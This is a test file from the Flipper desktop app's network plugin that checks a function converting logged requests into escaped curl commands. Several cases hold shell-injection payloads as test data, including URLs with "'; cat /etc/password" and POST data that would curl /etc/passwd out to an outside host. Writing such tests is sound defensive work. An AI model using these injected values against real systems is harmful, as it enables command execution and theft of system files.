10d990c32c
Summary: Plugins moved from "sonar/desktop/src/plugins" to "sonar/desktop/plugins". Fixed all the paths after moving. New "desktop" folder structure: - `src` - Flipper desktop app JS code executing in Electron Renderer (Chrome) process. - `static` - Flipper desktop app JS code executing in Electron Main (Node.js) process. - `plugins` - Flipper desktop JS plugins. - `pkg` - Flipper packaging lib and CLI tool. - `doctor` - Flipper diagnostics lib and CLI tool. - `scripts` - Build scripts for Flipper desktop app. - `headless` - Headless version of Flipper desktop app. - `headless-tests` - Integration tests running agains Flipper headless version. Reviewed By: mweststrate Differential Revision: D20344186 fbshipit-source-id: d020da970b2ea1e001f9061a8782bfeb54e31ba0
148 lines
4.0 KiB
TypeScript
148 lines
4.0 KiB
TypeScript
/**
|
|
* Copyright (c) Facebook, Inc. and its affiliates.
|
|
*
|
|
* This source code is licensed under the MIT license found in the
|
|
* LICENSE file in the root directory of this source tree.
|
|
*
|
|
* @format
|
|
*/
|
|
|
|
import {convertRequestToCurlCommand} from '../utils';
|
|
import {Request} from '../types';
|
|
|
|
test('convertRequestToCurlCommand: simple GET', () => {
|
|
const request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'GET',
|
|
url: 'https://fbflipper.com/',
|
|
headers: [],
|
|
data: null,
|
|
};
|
|
|
|
const command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual("curl -v -X GET 'https://fbflipper.com/'");
|
|
});
|
|
|
|
test('convertRequestToCurlCommand: simple POST', () => {
|
|
const request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: 'https://fbflipper.com/',
|
|
headers: [],
|
|
data: btoa('some=data&other=param'),
|
|
};
|
|
|
|
const command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST 'https://fbflipper.com/' -d 'some=data&other=param'",
|
|
);
|
|
});
|
|
|
|
test('convertRequestToCurlCommand: malicious POST URL', () => {
|
|
let request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: "https://fbflipper.com/'; cat /etc/password",
|
|
headers: [],
|
|
data: btoa('some=data&other=param'),
|
|
};
|
|
|
|
let command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
|
|
);
|
|
|
|
request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: 'https://fbflipper.com/"; cat /etc/password',
|
|
headers: [],
|
|
data: btoa('some=data&other=param'),
|
|
};
|
|
|
|
command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
|
|
);
|
|
});
|
|
|
|
test('convertRequestToCurlCommand: malicious POST URL', () => {
|
|
let request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: "https://fbflipper.com/'; cat /etc/password",
|
|
headers: [],
|
|
data: btoa('some=data&other=param'),
|
|
};
|
|
|
|
let command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST $'https://fbflipper.com/\\'; cat /etc/password' -d 'some=data&other=param'",
|
|
);
|
|
|
|
request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: 'https://fbflipper.com/"; cat /etc/password',
|
|
headers: [],
|
|
data: btoa('some=data&other=param'),
|
|
};
|
|
|
|
command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST 'https://fbflipper.com/\"; cat /etc/password' -d 'some=data&other=param'",
|
|
);
|
|
});
|
|
|
|
test('convertRequestToCurlCommand: malicious POST data', () => {
|
|
let request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: 'https://fbflipper.com/',
|
|
headers: [],
|
|
data: btoa('some=\'; curl https://somewhere.net -d "$(cat /etc/passwd)"'),
|
|
};
|
|
|
|
let command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\'; curl https://somewhere.net -d \"$(cat /etc/passwd)\"'",
|
|
);
|
|
|
|
request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'POST',
|
|
url: 'https://fbflipper.com/',
|
|
headers: [],
|
|
data: btoa('some=!!'),
|
|
};
|
|
|
|
command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X POST 'https://fbflipper.com/' -d $'some=\\u21\\u21'",
|
|
);
|
|
});
|
|
|
|
test('convertRequestToCurlCommand: control characters', () => {
|
|
const request: Request = {
|
|
id: 'request id',
|
|
timestamp: 1234567890,
|
|
method: 'GET',
|
|
url: 'https://fbflipper.com/',
|
|
headers: [],
|
|
data: btoa('some=\u0007 \u0009 \u000C \u001B&other=param'),
|
|
};
|
|
|
|
const command = convertRequestToCurlCommand(request);
|
|
expect(command).toEqual(
|
|
"curl -v -X GET 'https://fbflipper.com/' -d $'some=\\u07 \\u09 \\u0c \\u1b&other=param'",
|
|
);
|
|
});
|